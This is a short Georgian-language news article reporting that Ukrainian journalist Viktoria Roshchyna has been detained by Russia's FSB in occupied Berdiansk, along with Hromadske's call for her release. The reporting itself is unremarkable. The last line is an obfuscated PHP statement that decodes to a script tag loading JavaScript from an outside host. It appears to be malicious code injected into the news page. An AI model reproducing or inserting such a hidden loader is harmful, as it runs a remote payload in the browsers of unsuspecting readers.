celsiusi
ავერსი საქკაბელი
რუსმა ოკუპანტებმა უკრაინელი ჟურნალისტი გაიტაცეს - ამის შესახებ უკრაინული დამოუკიდებელი მედია Hromadske წერს.
 
როგორც თავად უკრაინული მედია წერს, ისინი ვიქტორია როშინას 12 მარტიდან ვერ უკავშირდებოდნენ. შემდგომ კი მათ წყაროებმა შეატყობინეს, რომ ვიქტორია როშინა ოკუპირებულ ბრედიანსკში იმყოფებოდა. 16 მარტს მიღებული ინფორმაციის თანახმად, ვიქტორია რუსეთის ФСБ-მ დააკავა. ამჟამად მისი ადგილსამყოფელის შესახებ ცნობილი არაფერია.
 
“ჩვენი ჟურნალისტი ვიქტორია როშინა, რუსი ოკუპანტების ტყვეა. რუსეთ-უკრაინის ომის მიმდინარეობის მანძილზე, ის მთელი დღეების განმავლობაში იღებდა ვიდეოებს და წერდა სტატიებს აღმოსავლეთ და სამხრეთ უკრაინის ცხელი წერტილებიდან”, – აღნიშნულია ინფორმაციაში.
 
უკრაინული მედია Hromadske მოუწოდებს უკრაინულ და საერთაშორისო საზოგადოებას ინფორმაციულად და ქმედებებით ჟურნალისტის გათავისუფლების საკითხში ჩაერთონ.
 
731
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");